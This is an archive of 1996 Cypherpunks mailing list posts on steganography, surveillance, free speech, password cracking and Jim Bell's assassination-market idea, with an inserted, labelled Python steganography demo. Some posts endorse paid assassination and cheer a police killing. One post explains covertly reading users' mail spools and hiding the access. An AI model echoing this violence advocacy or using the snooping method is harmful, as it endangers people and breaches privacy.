>This is not going to stop me >from producing an op-ed piece linkiing the net libertarians to assasination >politics unless I hear a few more repudiations of Bell's ideas. A doubt whether most people feel themselves obligated to repudiate a proposal, particularly if they don't know that it won't constitute an improvement over the status quo. On the other hand, if the world engineers a good, permanent solution to the Northern Ireland problem in the next six months, as well as the Middle East problem, the India/Pakistan problem, the Chechnya problem, the North/South Korea problem and a few other heretofore intractable problems, you can start feeling confident that my "extreme" solution will be avoidable. Until then, don't get your hopes up. >If you >don't very clearly reject his murderous ideas you are going to regret it >just as the left regreted having the USSR or the RAF associated with them. > Phill Time will be the best judge of this, I think. Jim Bell jimbell at pacifier.com From hallam at vesuvius.ai.mit.edu Tue Sep 24 02:35:14 1996 From: hallam at vesuvius.ai.mit.edu (hallam at vesuvius.ai.mit.edu) Date: Tue, 24 Sep 1996 17:35:14 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <199609240135.SAA23298@mail.pacifier.com> Message-ID: <9609240210.AA17228@vesuvius.ai.mit.edu> Jim, I do support the presence of troops in Northern Ireland and do not consider that to contradict my belief that there should be a united, autonamous Ireland. I do not believe that the "loyalists" are in fact loyal to the British way of life, any more than the KKK are representative of the US south. Troops are in Northern Ireland for a very simple and depressing reason. People like Jim want to impose their will on others by force. Despite prolonged attempts by each faction to assasinate the leaders of the other they have been unsuccessful. 
If terrorists trained by Libya and Syria are unable to assassinate at will then we can be sure that Jim's band of kooks is not going to get any further. If the integration of both Ireland and the UK into the European Union has not ended the situation the complete lack of government will not either. It is surprising that someone from the press has not seized upon Jim's ideas as cause for another cyber-scare. I suspect this is because people like Markof are somewhat more responsible. This is not going to stop me from producing an op-ed piece linking the net libertarians to assassination politics unless I hear a few more repudiations of Bell's ideas. If you don't very clearly reject his murderous ideas you are going to regret it just as the left regretted having the USSR or the RAF associated with them. Phill From jim at suite.suite.com Tue Sep 24 02:35:18 1996 From: jim at suite.suite.com (Jim Miller) Date: Tue, 24 Sep 1996 17:35:18 +0800 Subject: really undetectable crypto made somewhat practical In-Reply-To: Message-ID: <9609240307.AA02627@suite.com> > I'm on FCPUNX instead of regular Cypherpunks, so please > excuse me if I'm a little behind the thread. > Few on the cypherpunk list replied to my post, so you didn't miss anything important. > Instead of hashing just the word in an effort to get stego > bits, you could hash a key along with the word. In order to > get the intended hash you would need to know the key. Since > you're probably hashing a whole block of 512 bits (or > whatever's specified in the algorithm) appending a key > should not affect the speed of the system. I'm certain > that this would increase the security, possibly enough > that you wouldn't need to use a regular encryption > algorithm (but I wouldn't bet on it). > I like your suggestion, although not for the reason you suggested it (although your use is a good idea, too). The use of keyed hashes solves one of the problems I saw with my scheme.
The main problem I saw with my scheme was that it might be possible to detect that an innocuous message was conveying a hidden encrypted message by analyzing the statistical properties of the relevant hash bits. Problem: If the words in a message are chosen so some of their hash bits (say, 4 bits per hash) combine to form an encrypted message, then those combined hash bits would be suspiciously cryptographically random, whereas the combined hash bits of a message that was not created for the purpose of conveying an encrypted message would not necessarily be cryptographically random. It is conceivable that a program could be written that uses this difference to test if a message is conveying a hidden encrypted message. Solution: Rather than using an unkeyed hash, which gives Eve the ability to generate the relevant block of combined hash bits and test them for certain properties, use a keyed hash. Since Eve does not know the key used to hash the words in the message, she will not be able to generate the relevant block of combined hash bits and will not be able to perform meaningful analysis of the properties of those bits. Further analysis: By hashing words and then using only the first 4 hash bits, what you are really doing is sorting all words into 16 groups. Group 0 consists of all words whose first four hash bits are 0000, group 1 consists of all words whose first four hash bits are 0001, ..., group 15 consists of all words whose first four hash bits are 1111. If a message is constructed by selecting words so their first 4 hash bits combine to form an encrypted message, then, if the message is long enough or you send enough messages, you will probably select words "evenly" from each of the 16 word groups. However, I can think of no reason to assume the distribution of group selections would be "even" for normal messages. Maybe, by some weird fluke, normal messages are mostly constructed from words in groups 1, 3, 4, 9, and 14, for example. 
By using a keyed hash, you're not stuck using a fixed set of word groups. A different hash key will sort the words into different groups. Hash keys effectively prevent Eve from knowing which words in your message came from which groups, thus preventing her from determining if words were chosen "evenly" from each group. Jim_Miller at suite.com From stewarts at ix.netcom.com Tue Sep 24 03:09:04 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 24 Sep 1996 18:09:04 +0800 Subject: Go away CIA Message-ID: <199609240242.TAA28421@dfw-ix7.ix.netcom.com> At 07:32 PM 9/22/96 -0500, Shane Brath wrote: >On Sat, 21 Sep 1996, Wearen Life wrote: >> I won't be surprised if they were ALSO watching who was visiting your page. >But how would they go about globally watching who goes to your URL, unless >they hack into your server and look at the log, or have a network sniffer >at an access point feeding you? 1) Spooks can do anything :-) 2) Network Solutions Inc., who runs the NIC, is run by spooks. While they don't run all the root-level domain name servers, they influence most of the US ones. It wouldn't be surprising if they can track DNS requests to the root servers, which would let them find which ISPs are looking for the addresses of which second-level domains. This isn't very informative when somebody at aol.com wants an address of compuserve.com (which will get cached at aol.com's DNS server anyway), but tells them a lot more when small-isp.com asks for skeeve.net's address, especially when they know which Usual Suspects are at small-isp.com . 3) Added-paranoia mode, for people who believed 2) :-) Suppose you've got a vanity domain name, like skeeve.net, and they really want to track you.
So they hack the data in the .net nameserver to respond to requests for skeeve.net with 198.81.129.94, which tells you that www.skeeve.net is 191.127.0.42, which runs an http server that fetches the information from 203.28.52.181 that you're asking for and an SMTP relay hack that forwards the mail while keeping copies for itself. (Even if you're running SSL encrypted, it can probably still play active eavesdropper, knowing who's talking to 203.28.52.181, though it can't read the encrypted packets. If SSL is currently including IP addresses in the encrypted information to reduce spoofing, it can still at least hose the conversation.) Your ISP will cache this, so the next time somebody wants to talk to skeeve.net, it'll take care of that for them. This really doesn't work well for targets on aol.com, compuserve.com, prodigy.com, ix.netcom.com, worldnet.att.net, and uunet.net that are a bit big to filter all the traffic for, of course, but it catches most of the interesting people. 4) If they _do_ participate in the Network Access Points (e.g. fnords.net, on one of the Metropolitan Area Exchange FDDI rings, is really a CIA plant) they could probably sniff packets for people they don't have peering arrangements with. If you don't see the fnords, they won't eat your packets. If you do see the fnords, they will eat your packets, so you won't see them. This doesn't work as well for switch-based NAPs such as Big Hairy Routers or ATM switches, but ATM Virtual Circuits have fnords all over them anyway; that's why there are _5_ bytes in the header. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From markm at voicenet.com Tue Sep 24 03:29:43 1996 From: markm at voicenet.com (Mark M.) Date: Tue, 24 Sep 1996 18:29:43 +0800 Subject: William Torbitt (pseudonym) In-Reply-To: Message-ID: On Sat, 21 Sep 1996, Timothy C. 
May wrote: > Presumably the same William Torbitt (pseudonym) who wrote the > Samizdat-distributed "Nomenclature of an Assassination Cabal." > > (One of the best treatments of the various swirling connections surrounding > the JFK assassination and related CIA-Mob-Giancana-Hughes-Castro-etc. > connections.) > > That Torbitt was a pseudonym has some connection to the themes of our list. > It is believed by many--and it sounds plausible to me--that the actual > author was a knowledgeable Texas attorney who had gained much familiarity > with the facts of the case and, circa 1966-68, wrote his extended pamphlet > "The Nomenclature of an Assassination Cabal." Fearing likely sanctions, > both professional and personal, he chose not to use his real name, and > pamphlet circulated informally, without a formal publisher. > > (It is not written in a wacko-style, so I don't dismiss it as the ravings > of a loon.) > > I haven't checked to see if it's on the Web. No, but for anyone who's interested, it's available from Prevailing Winds Research (http://www.prevailingwinds.org) for about $7. -- PGP encrypted mail preferred. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From markm at voicenet.com Tue Sep 24 03:55:01 1996 From: markm at voicenet.com (Mark M.) Date: Tue, 24 Sep 1996 18:55:01 +0800 Subject: Snooping ISP admin?? In-Reply-To: <32468D68.5E2@hooked.net> Message-ID: On Mon, 23 Sep 1996, Michael E. Carboy wrote: > Greetings All, > > Question for the group: I have encountered a situation that causes me > to believe an ISP is snooping through encrypted mail. It seems that > PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have > encountered "POP3 account in use by another user" several times in the > past few days and I am the only user... wondering if that "in use" > message is the result of a clumsy sysadmin being caught with his hand > in the cookie jar. Any thoughts from the group??? 
If those more > knowledgeable than I deem these NOISE... my sincere apologies. Any sysadmin using POP3 to snoop through your mail would have to be a complete moron. It's much easier to just "cat /usr/spool/mail/user" which is undetectable. The sysadmin could then use touch to set the "last read" value to the previous value. Anyone with complete access to the POP3 server would be able to snoop through anyone's mail undetected. My guess is that you are getting that error from a stale lockfile. If any sysadmin is snooping through your mail, you wouldn't know it. Mark -- PGP encrypted mail preferred. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From tcmay at got.net Tue Sep 24 04:01:35 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 24 Sep 1996 19:01:35 +0800 Subject: Bernstein hearing: The Press Release Message-ID: At 2:23 PM 9/23/96, Declan McCullagh wrote: >On Sun, 22 Sep 1996, Timothy C. May wrote: > >> If California were to, say, ban speech critical of women's or homosexual's >> rights, would not the First Amendment trump this attempt? > >Not necessarily. > >The Supreme Court has upheld Title VII's ban on workplace "harassment." >The Court said it occurred when "discriminatory intimidation, ridicule, and >insult" in a workplace create an uncomfortable "working environment." 
> >Then there's public accommodation law, under which the (I recall) Greek >owner of a privately-operated diner was held liable for using the word >"nigger" where a black woman could overhear. Whoops! I didn't mean to intersect with "workplace" issues--I mean simple, pure, nonworkplace-related speech. To make this clearer and to separate Title VII stuff out: If California were to, say, ban speech which included the word "orange," or to ban speech which mentioned "Allah," wouldn't the First trump this attempt? As to Title VII and all that garbage, I think the First Amendment means what it says, and that there's something desperately wrong when many blacks call each other "niggers," as in "Yo, Nigga!," but nonblacks can be hit with lawsuits for letting this word slip out. By the way, I just read chunks of Ronald Dworkin's new book on the Constitution, and he makes some interesting comments on the feminist view that words hurtful to women ought to be censored...he's against such interpretations, and argues that if speech hurtful to women, or images hurtful to women, etc., are banned, then why not ban speech critical of Creationists, and speech insulting to Flat Earthers? --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." 
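Added example, not from any message in this archive: the word-group scheme from Jim Miller's keyed-hash message earlier in this digest, with Eve's evenness check run against it. The hash (SHA-256, HMAC-SHA256 for the keyed case), the pseudo-word vocabulary with Zipf-like usage, the key and the random nibbles standing in for ciphertext are all assumptions; the message names none of them.

```python
import hashlib
import hmac
import random
from itertools import product

# Constructed 360-word vocabulary of pseudo-words, most frequent first.
VOCAB = ["".join(p) for p in product("bdfgklmnprst", "aeiou", "lmnrst")]
WEIGHTS = [1.0 / rank for rank in range(1, len(VOCAB) + 1)]  # Zipf-like usage


def group(word, key=None):
    """Return the word's group 0..15: the first 4 bits of its hash."""
    data = word.encode()
    if key is None:
        digest = hashlib.sha256(data).digest()  # unkeyed: Eve can compute it too
    else:
        digest = hmac.new(key, data, hashlib.sha256).digest()  # needs the key
    return digest[0] >> 4


def build_groups(key=None):
    """Sort the vocabulary into its 16 groups under the given key."""
    groups = [[] for _ in range(16)]
    for word, weight in zip(VOCAB, WEIGHTS):
        groups[group(word, key)].append((word, weight))
    if any(not g for g in groups):
        raise ValueError("a group is empty; vocabulary too small for this key")
    return groups


def embed(nibbles, key, rng):
    """Pick one word per 4-bit value, weighted by normal usage inside its group."""
    groups = build_groups(key)
    chosen = []
    for nibble in nibbles:
        words, weights = zip(*groups[nibble])
        chosen.append(rng.choices(words, weights)[0])
    return chosen


def extract(words, key):
    """Receiver side: recover the 4-bit values from the words."""
    return [group(w, key) for w in words]


def evenness(words, key=None):
    """Chi-square statistic (15 degrees of freedom) of group counts vs. uniform.

    Around 15 means the 16 groups were used evenly; much larger means uneven.
    """
    counts = [0] * 16
    for w in words:
        counts[group(w, key)] += 1
    expected = len(words) / 16
    return sum((c - expected) ** 2 / expected for c in counts)


def demo(n=16000, seed=1996):
    rng = random.Random(seed)                      # fixed seed: repeatable run
    key = b"constructed demo key"                  # constructed, shared secret
    nibbles = [rng.getrandbits(4) for _ in range(n)]  # stands in for ciphertext
    normal = rng.choices(VOCAB, WEIGHTS, k=n)      # text carrying no message
    stego_unkeyed = embed(nibbles, None, rng)
    stego_keyed = embed(nibbles, key, rng)
    return {
        "normal text, Eve hashes words": evenness(normal),
        "unkeyed stego, Eve hashes words": evenness(stego_unkeyed),
        "keyed stego, Eve hashes words": evenness(stego_keyed),
        "keyed stego, key holder": evenness(stego_keyed, key),
        "decodes": extract(stego_keyed, key) == nibbles,
    }


if __name__ == "__main__":
    for label, value in demo().items():
        print(f"{label:34} {value}")
```

Group evenness is the only property the message discusses and the only one this sketch tests. It says nothing about how natural the resulting word frequencies or sentences look to other kinds of analysis.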
From grafolog at netcom.com Tue Sep 24 04:08:35 1996 From: grafolog at netcom.com (jonathon) Date: Tue, 24 Sep 1996 19:08:35 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <9609240210.AA17228@vesuvius.ai.mit.edu> Message-ID: On Mon, 23 Sep 1996 hallam at vesuvius.ai.mit.edu wrote: > Troops are in Northern Ireland for a very simple and depressing > reason. People like Jim want to impose their will on others by force. The person who wishes to keep those troops in Northern Ireland is the head of an extremely dysfunctional family. The current occupant of 10 Downing Street simply contributes to the problem --by trying to enforce 400+ years of unsuccessful rule. << Logically, the British ought to have figured out by now that they aren't welcome now, and never were welcome in Ireland, but then, they aren't noted for their logic. >> > and Syria are unable to assassinate at will then we can be sure > that Jim's band of kooks is not going to get any further. #1: Syrian and Libyan assassins have been extremely effective, in terminating with extreme prejudice, their targets. #2: the AP contractors are paid for their work. $10x5^6, is my guess as the starting price for eliminating some of the despots that inflict their warped rule on others. --- The aforementioned dysfunctional family might make a good starting point. > It is surprising that someone from the press has not seized upon Jim's > ideas as cause for another cyber-scare. I suspect this is because people The idea was first proposed 200 + years ago. Computer technology simply makes it easier to implement. And the press in that day had a hard time dealing with it, because in denouncing it, they spread the idea that maybe it is a good thing. Ignored, it becomes forgotten. Denounced, it becomes a cause celebre. > like Markof are somewhat more responsible. 
This is not going to stop me > from producing an op-ed piece linking the net libertarians to assassination Do that op-ed piece --- but remember that AP is not a libertarian position. Libertarians think that government is a good thing. AP thinks that government is a bad thing, and their philosophical differences get wider, from there. xan jonathon grafolog at netcom.com Patience is a virtue, Virtue is a grace. Grace is a little girl, Who did not wash her face. From schmidt at pin.de Tue Sep 24 04:18:14 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Tue, 24 Sep 1996 19:18:14 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: <199609232122.OAA15542@atropos.c2.org> Message-ID: On Mon, 23 Sep 1996 sameer at c2.net wrote: > How does this mean that Germany wins? "radikal 154" is still > available all over the world, at almost 50 mirror sites, I believe > (including http://www.c2.net/radikal/), which are *not* blocked by > Germany. ^^^^^^^^^ ICTF members blocked the site. (?) (Non-members didn't block it.) They brought one server down, which they didn't like. So 'they' think, they won. That's the only important thing. Hmm. Did they stop blocking the ip ? I have access. -stephan From rod at wired.com Tue Sep 24 04:31:25 1996 From: rod at wired.com (Roderick Simpson) Date: Tue, 24 Sep 1996 19:31:25 +0800 Subject: Barlow/Taylor censorship debate Message-ID: Come join in John Perry Barlow's Brain Tennis debate (www.wired.com/braintennis/) versus CDA supporter and president of the National Law Center for Children and Families, Bruce Taylor, over government censorship and free speech. Taylor has also been a Justice lawyer and prosecutor for the city of Cleveland, where he prosecuted, among others, Larry Flynt. Their debate will last from today through next Wednesday, October 2. To post, go to: http://www.hotwired.com/cgi-bin/interact/replies_all?msg.25733 See you there! 
Roderick Simpson Associate Producer Wired Online From tcmay at got.net Tue Sep 24 04:36:07 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 24 Sep 1996 19:36:07 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote: >like Markof are somewhat more responsible. This is not going to stop me >from producing an op-ed piece linking the net libertarians to assassination >politics unless I hear a few more repudiations of Bell's ideas. If you >don't very clearly reject his murderous ideas you are going to regret it >just as the left regretted having the USSR or the RAF associated with them. I for one don't respond well to extortion threats, so write your damned article. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From stewarts at ix.netcom.com Tue Sep 24 04:43:26 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 24 Sep 1996 19:43:26 +0800 Subject: Snake-Oil FAQ Message-ID: <199609240711.AAA12386@dfw-ix9.ix.netcom.com> At 12:34 PM 9/23/96 -0400, Mark Rogaski wrote: >I disagree, I think AC is a pretty scary book for the kind of people who >need the Snake-Oil FAQ. I think the primary target audiences are IS >professionals who are considering integrating crypto into their data >communications and end users who want to send encrypted mail. Neither Besides, it's a good excuse to bash that great purveyor of snake-oil, MicroSoft. 
Are there _any_ Microsoft products that have "password protection" or "encryption" features that aren't totally wimpy? Word and Excel come with stuff that might keep out your kid sister, but probably wouldn't keep out _my_ kid sister... # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From deviant at pooh-corner.com Tue Sep 24 04:58:12 1996 From: deviant at pooh-corner.com (The Deviant) Date: Tue, 24 Sep 1996 19:58:12 +0800 Subject: Paradox db passwords/encryption In-Reply-To: <199609231753.KAA22705@toad.com> Message-ID: On Mon, 23 Sep 1996, David K. Merriman wrote: > Date: Mon, 23 Sep 1996 10:53:14 -0700 (PDT) > From: "David K. Merriman" > To: cypherpunks at toad.com > Subject: Paradox db passwords/encryption > > To: cypherpunks at toad.com > Date: Mon Sep 23 12:52:32 1996 > Sorry to disturb everyone, but I've got a question that is (gasp!) > immediately related to crypto: > > Does anyone have any info on the encryption used in the Paradox (4.5 for > Win) database? I've got someone that has an encrypted (well, > password-protected :-) Paradox database that needs some maintenance, and > the person that knew the password is now - shall we say - 'no longer with > them'. Right now, doesn't matter if it's something clever, or a brute-force > hack; they just need to get into the tables and such. > > Dave Merriman > > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- > PGP Email welcome, encouraged, and PREFERRED. Visit my web > site at http://www.shellback.com/p/merriman > for my PGP key and fingerprint > "What is the sound of one hand clapping in a forest > with no one there to hear it?" > I use Pronto Secure (tm) PGP-fluent Email software for Windows 9 times out of 10 Norton's Disk Edit will crack word processor/spreadsheet type encryption... --Deviant Slowly and surely the unix crept up on the Nintendo user ... 
From frissell at panix.com Tue Sep 24 08:03:48 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 24 Sep 1996 23:03:48 +0800 Subject: Where to write crypto? Message-ID: <3.0b19.32.19960923075911.00bd74d4@panix.com> At 07:24 AM 9/23/96 -0500, Adam Shostack wrote: >Switzerland is not the most liberal (libertarian) of countries. >Getting a work permit can be very tough. However, there are crypto >companies and research groups. Haeglin and ETH-Zurich (ETH is Swiss >Federal Institute of Technology) spring to mind. > >Adam One does not need a work permit to travel around Europe staying in various places and writing crypto. Work permits only apply to residents. DCF From dlv at bwalk.dm.com Tue Sep 24 08:35:07 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 24 Sep 1996 23:35:07 +0800 Subject: Ways to deal with cops Message-ID: Way to go! >Path: ...!news1.erols.com!hunter.premier.net!www.nntp.primenet.com!nntp.primenet.com!news.sgi.com!news.msfc.nasa.gov!newsfeed.internetmci.com!info.ucla.edu!nnrp.info.ucla.edu!oak!zeleny >From: zeleny at oak.math.ucla.edu (Michael Zeleny) >Newsgroups: talk.politics.misc,talk.politics.guns,ca.politics,la.news,misc.legal >Subject: Man Facing Death Sentence For Killing Trespassing Cop >Date: 20 Sep 1996 17:46:21 GMT >Organization: ptyx >Lines: 62 >Message-ID: <51ul9d$21e4 at uni.library.ucla.edu> >NNTP-Posting-Host: oak.math.ucla.edu > >Do you wonder what happens to civilians unwilling to lie down for >police abuse of power? Daniel Allan Tuffree, 49, a former high school >teacher, the testimony in whose trial ended yesterday, has been charged >with first-degree murder in the shooting death of Officer Michael Clark >13 months ago, after three warrantless police officers traipsed on his >front lawn with their guns drawn -- to check on his welfare. The case, >which is presided over by the notoriously prosecution-friendly Judge >Allan L. 
Steele in the Simi Valley courthouse that hosted the acquittal >of Rodney King's uniformed assailants in their first trial, will go to >the jury in early October after jury instructions are drawn and lawyers >make their closing arguments. Tuffree faces a possible death sentence. > >Clark was one of three police officers sent to Tuffree's home on >August 4, 1995, after reports that the former Chatsworth High School >teacher had been drinking alcohol, taking Valium and was possibly >suicidal. A gunfight began shortly after police walked into Tuffree's >backyard and started asking him questions, refusing his order to leave >his property. Defense attorneys have argued that Clark fired on >Tuffree first and that police acted improperly. They called expert >witnesses who testified that police should have walked away once they >realized that Tuffree was not hurt or suicidal. > >Lou Reiter, a retired Los Angeles Police Department commander, >testified that Simi Valley police officers made one mistake after >another when they came to Tuffree's home. According to Reiter's >testimony, the three police officers were working with third-hand >information when they arrived at the scene. Before taking action, >they did not devise a plan in case a confrontation occurred with >Tuffree, who was a known gun owner. And they did not announce >themselves before walking into Tuffree's backyard with their guns >drawn, all actions that could have aggravated a distraught man who >reportedly had been drinking alcohol, taking Valium and who had >stopped answering his phone. "No one had anticipated or made an >evaluation of what would happen if things didn't go right," said >Reiter, a private consultant on police procedure who was an LAPD >officer for 20 years. 
He also told the jury that he believed Simi >Valley Police Sergeant Anthony Anzilotti to have been negligible in >his role as the supervising officer on scene that day, testifying that >"in [his] opinion [Anzilotti] didn't supervise at all." And he said >Clark erred by not walking away from Tuffree's kitchen window once he >realized the former schoolteacher was conscious and not injured: "The >emergency is over; therefore, the right to be in his backyard is >over." > >Reiter denied the claims of two other police experts called by the >prosecution, both of whom testified that Simi Valley police officers >sent to Tuffree's house last summer had a "moral, ethical, and legal" >obligation to follow through with the request to check on Tuffree's >welfare, having no choice but to get close enough to make direct >contact with Tuffree in order to ensure that he was safe. But Reiter, >who retired from the LAPD in 1981, said that "officers always have a >choice," explaining that there are situations in which police can walk >away once they have determined that a person is safe. "There are a >lot of people in their homes that are not confronting a medical >emergency who just want to be left alone," he said. > >See http://www.latimes.com/HOME/COMMUN/NEWS/ZONE26B for more information. > >Cordially, - Mikhail | God: "Sum id quod sum." Descartes: "Cogito ergo sum." >Zeleny at math.ucla.edu | Popeye: "Sum id quod sum et id totum est quod sum." >itinerant philosopher -- will think for food ** www.ptyx.com ** MZ at ptyx.com >ptyx ** 6869 Pacific View Drive, LA, CA 90068 ** 213-876-8234/874-4745 (fax) From DMiskell at envirolink.org Tue Sep 24 08:39:19 1996 From: DMiskell at envirolink.org (Daniel Miskell) Date: Tue, 24 Sep 1996 23:39:19 +0800 Subject: Banning annoying users Message-ID: <199609241158.HAA27269@envirolink.org> The not allowing unsubscribed individuals to post is logical, for a time. 
But that basically outlaws anon remailers that don't allow you to send to an account, and a lot of them don't, from my limited understanding. Besides, if we set up the list to ban people who are 'undesirable', instead of just using our own killfiles to do the dirty work for the list, then what is to stop someone from banning you? Sure, you move on to another list, but, personally, I wouldn't want it done to me, and so I would not do it to someone else. But, like I said, personal killfiles are more than encouraged. It resolves these kinds of conflicts a lot faster and cleaner than debating who and who should not be banned. --- Daniel. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From jlv at signet.sig.bsh.com Tue Sep 24 09:12:16 1996 From: jlv at signet.sig.bsh.com (Jason Vagner) Date: Wed, 25 Sep 1996 00:12:16 +0800 Subject: Snooping ISP admin?? In-Reply-To: <199609232112.QAA07155@xanadu.io.com> Message-ID: > > Question for the group: I have encountered a situation that causes me > > to believe an ISP is snooping through encrypted mail. It seems that > > PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have > > encountered "POP3 account in use by another user" several times in the > > past few days and I am the only user... wondering if that "in use" > > message is the result of a clumsy sysadmin being caught with his hand > > in the cookie jar. Any thoughts from the group??? If those more > > knowledgeable than I deem these NOISE... my sincere apologies. > > An admin could just copy the mail spool file to a safer place, then read > through at their leisure. > > Unless it's someone totally clueless (which some ISP's are), I doubt that > they are pulling off the pop3d. 
It could be that your mail spool file is > locked by a mail transport agent, and that is why that error message is > occurring. > > Any thoughts? As someone who has operated an ISP himself, I would say that the likelihood of this being a system problem is very high. Especially if this is a relatively new ISP, or if they've upgraded anything at all on their mail server, it's pretty easy to break the delicate balance of daemons and permissions such that this problem could easily occur. It's worth a call to their technical support line (I know.. I'm sure it's always busy) just to inform them of the problem. Sometimes it'll time out (if it's one kind of problem) and sometimes it'll hang there until a lock file is specifically removed (a different kind of problem). All other comments regarding the likelihood that a sysadmin would try to read mail in the real environment apply. Jason From sandfort at crl.com Tue Sep 24 10:20:01 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Wed, 25 Sep 1996 01:20:01 +0800 Subject: WHO IS MAKING A MOCKERY OF WHOM? In-Reply-To: <199609240520.WAA22684@abraham.cs.berkeley.edu> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Time for another informal poll. On Mon, 23 Sep 1996, John Anonymous MacDonald wrote: > What a joy to make a public mockery of Tim Mayo! Do list members think Anonymous' posts make a public mockery of Tim May or Anonymous? Let me know whose reputation you think is enhanced or tarnished by these posts. I'll post a summary to the list in a week or two. 
Thanks, S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From KM5Y75088 at aol.com Tue Sep 24 10:24:30 1996 From: KM5Y75088 at aol.com (KM5Y75088 at aol.com) Date: Wed, 25 Sep 1996 01:24:30 +0800 Subject: crypto help..system help Message-ID: <960924092527_484293026@emout03.mail.aol.com> I am trying to get involved with crypto and have had a long-distance helper but we are having problems getting our 3.1 based system working with win 95. Uses a GUI programmed in 16 bit visual basic. Need someone willing to come over and help . Dallas area zip 75030 or 75088..... From m5 at tivoli.com Tue Sep 24 10:46:26 1996 From: m5 at tivoli.com (Mike McNally) Date: Wed, 25 Sep 1996 01:46:26 +0800 Subject: Bork book Message-ID: <3247E5B8.6181@tivoli.com> Robert Bork was on NBC (I think) being interviewed to plug his hot new book "Slouching Towards Gomorrah" (or something like that). The snippet of interview I caught was the last part, with the interviewer asking how Bork could reconcile his desire that we all be more free with his notion that we let the Constitution "control" us, and that legislatures should be able to outlaw all the profanity and indecency that they want. Any of the cypherpunk.lawyers seen this? Bork came across as kind-of a jerk, personality-wise. -- ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From gary at systemics.com Tue Sep 24 10:53:08 1996 From: gary at systemics.com (Gary Howland) Date: Wed, 25 Sep 1996 01:53:08 +0800 Subject: provably hard PK cryptosystems In-Reply-To: Message-ID: <3247E194.3F54BC7E@systemics.com> Asgaard wrote: > > On Sun, 22 Sep 1996, Timothy C. 
May wrote: > > > Suppose a tile is placed at some place on the grid, and another tile > > (possibly a different tile, possibly the same type of tile) is placed some > > distance away on the grid. The problem is this: Can a "domino snake" be > > found which reaches from the first tile to the second tile, with the > > constraint that edges must match up on all tiles? (And all tiles must be in > > normal grid locations, of course) > > Intuitively (but very well not, I'm not informed enough to know) > this might be a suitable problem for Hellman's DNA computer, the > one used for chaining the shortest route including a defined > number of cities? This is starting to sound like Wired magazine. I fail to see *any* (non educational) use for these DNA "computers", let alone a cryptographic use - sure, they may be massively parallel, but what's the big deal? I can now perform a calculation a million times faster than I could yesterday? (something I personally doubt, but will agree to for sake of the argument). I could get the same results writing a cycle stealing Internet java app, so what's all the fuss about? L8r d00d2 DNA Mutant -- pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From bkmarsh at feist.com Tue Sep 24 10:55:55 1996 From: bkmarsh at feist.com (Bruce M.) Date: Wed, 25 Sep 1996 01:55:55 +0800 Subject: Previous disk erasing thread Message-ID: ---------- Forwarded message ---------- Date: Thu, 05 SEP 1996 10:23:32 -0700 To: Steve Harris Newgroups: alt.security Subject: Re: Security Disk Washer Steve Harris wrote: > > When you delete files, you don't really remove the data. DOS simply > marks the area as available for overwriting by new data. Sometimes > this is useful - the "Undelete" program exploits this to allow you to > recover accidentally deleted files. On other occasions, this is a > security risk - you want to prevent people recovering confidential > data. 
